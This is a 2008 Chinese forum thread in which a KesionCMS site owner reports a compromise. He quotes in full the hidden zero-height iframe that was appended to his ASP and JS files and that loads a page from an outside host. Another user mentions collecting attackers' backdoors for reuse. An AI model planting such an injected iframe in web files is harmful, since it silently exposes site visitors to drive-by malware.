账号通
    

账号  

密码  

1346

查看

3

回复
主题:汗!V5.0也遭木马攻击 [收藏主题] 转到:  
wsdx 当前离线

153

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1692 分
登录次数:157 次
注册时间:2006/10/4
最后登录:2010/3/3
wsdx 发表于:2008/8/6 8:53:00   | 只看该作者 查看该作者主题 楼主 
科汛智能建站系统

本人用的是最新的V5.0版本,虚拟主机。

 

昨天后台登陆不上去,登陆后是一空白页。以为服务器的问题,今天起来一试还是这样。于是查看服务器里的文件,发现admin目录下的KS.WebFiles.asp大小有变化,下载后查看文件是空的。上传了一个原始文件后,后台能正常登陆了。

 

后发现许多文件的日期发生了变化,有点奇怪,一般的文件日期都是上传的日期怎么自动更新了呢,下载了一些看了一下,这才大吃一惊,反是ASP文件(甚至JS文件)最后都注入了一段代码: <iframE src="http://www.sOrsent.cn/ka.htm?mOr" widTh=100 name='3920' HeigHt=0></iframe>。明白了,我的站点又被黑了!

 

询问虚拟主机供应商(怀疑是服务器有漏洞),他们说他们的服务器没问题。但我安排的是 V5.0的全新版本,也没放其它程序,怎么又被黑了,真有点晕了。这么多文件被更改,怎么办呀,真惨!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
shuisheng 当前离线

324

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:3360 分
登录次数:188 次
注册时间:2007/9/11
最后登录:2013/6/6
shuisheng 发表于:2008/8/7 0:08:00   | 只看该作者 查看该作者主题 沙发 
科汛在线商城系统(NET)

可以找出他们留的后门,其实很多后门都可以拿来用的,可以批量删除!!!木马也是一个很好用的清除工具。。

我都收集到好几种了,。。呵呵。不过有些用了批量会造成KS数据库坏掉不能用。。。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
wsdx 当前离线

153

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1692 分
登录次数:157 次
注册时间:2006/10/4
最后登录:2010/3/3
wsdx 发表于:2008/8/6 9:54:00   | 只看该作者 查看该作者主题 藤椅 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
cms2007 当前离线

4445

主题

8

广播

15

粉丝
添加关注
级别:超级版主

用户积分:23396 分
登录次数:1515 次
注册时间:2007/8/7
最后登录:2022/12/6
cms2007 发表于:2008/8/6 9:00:00   | 只看该作者 查看该作者主题 板凳 
科汛智能建站系统

感谢你提交,官方会进一步测试,如果确实存在注入点,会第一时间发布补丁

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.10938秒 powered by KesionCMS 9.0